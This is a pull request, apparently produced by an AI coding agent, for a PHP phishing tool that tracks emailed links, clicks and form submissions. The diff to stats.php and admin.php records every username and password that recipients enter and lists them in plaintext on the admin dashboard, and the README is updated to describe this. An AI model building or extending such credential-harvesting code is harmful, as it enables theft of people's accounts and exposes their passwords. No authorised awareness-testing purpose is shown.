### PR TITLE
Handle repeated clicks and submissions

### DIFF
--- a/README.md
+++ b/README.md
@@ -81,7 +81,8 @@ Beispiel:
 ## Live-Dashboard
 
 - `admin.php` lädt alle 5 Sekunden Daten aus `stats.php`
-- Anzeige: versendet / geklickt / abgesendet + Details
+ - Anzeige: versendet / geklickt / abgesendet + Details
+ - Mehrfache Klicks und Formularsendungen werden gezählt und samt eingegebener Daten aufgeführt
 
 ## SMTP-Konfiguration (`config.php`)
 

--- a/admin.php
+++ b/admin.php
@@ -134,14 +134,20 @@ function load(){
                 html+='<ul>';
                 s.entries.forEach(e=>{
                     let status=[];
-                    if(e.click_time) status.push('geklickt');
-                    if(e.submit_time) status.push('Form gesendet');
+                    if(e.clicks && e.clicks.length){
+                        status.push(e.clicks.length>1?`${e.clicks.length}x geklickt`:'geklickt');
+                    }
+                    if(e.submissions && e.submissions.length){
+                        status.push(e.submissions.length>1?`${e.submissions.length}x Form gesendet`:'Form gesendet');
+                    }
                     html+=`<li>${e.email}`;
                     if(status.length) html+=` - ${status.join(', ')}`;
-                    if(e.entered_user || e.entered_pass){
-                        const u=e.entered_user||'';
-                        const p=e.entered_pass||'';
-                        html+=` [${u} / ${p}]`;
+                    if(e.submissions && e.submissions.length){
+                        e.submissions.forEach(su=>{
+                            const u=su.user||'';
+                            const p=su.pass||'';
+                            html+=` [${u} / ${p}]`;
+                        });
                     }
                     html+='</li>';
                 });

--- a/stats.php
+++ b/stats.php
@@ -12,21 +12,23 @@ foreach($logs as $file){
         $stats['last'] = max($stats['last'],$d['time']);
         if($d['event']=='sent'){
             $stats['total_sent']++;
-            $hashMap[$d['hash']] = ['email'=>$d['email']];
+            $hashMap[$d['hash']] = ['email'=>$d['email'], 'clicks'=>[], 'submissions'=>[]];
         }
         if($d['event']=='send_error' || $d['event']=='send_exception'){
             $stats['errors']++;
         }
         if($d['event']=='clicked'){
             $stats['clicked']++;
-            if(isset($hashMap[$d['hash']])) $hashMap[$d['hash']]['click_time']=$d['time'];
+            if(isset($hashMap[$d['hash']])) $hashMap[$d['hash']]['clicks'][]=$d['time'];
         }
         if($d['event']=='submitted'){
             $stats['submitted']++;
             if(isset($hashMap[$d['hash']])) {
-                $hashMap[$d['hash']]['submit_time']=$d['time'];
-                $hashMap[$d['hash']]['entered_user']=$d['user'];
-                $hashMap[$d['hash']]['entered_pass']=$d['pass'];
+                $hashMap[$d['hash']]['submissions'][]=[
+                    'time'=>$d['time'],
+                    'user'=>$d['user'],
+                    'pass'=>$d['pass']
+                ];
             }
         }
     }


### PR DESCRIPTION
## Summary
- track multiple link clicks and form submissions in `stats.php`
- show click and submission counts with all entered credentials in admin dashboard
- document the new dashboard behaviour in README

## Testing
- `php -l admin.php`
- `php -l stats.php`
- `php -l index.php`
- `php -l guru.php`
- `php -l config.php`


------
https://chatgpt.com/codex/tasks/task_e_688313f46a008327b368c1393768f5e0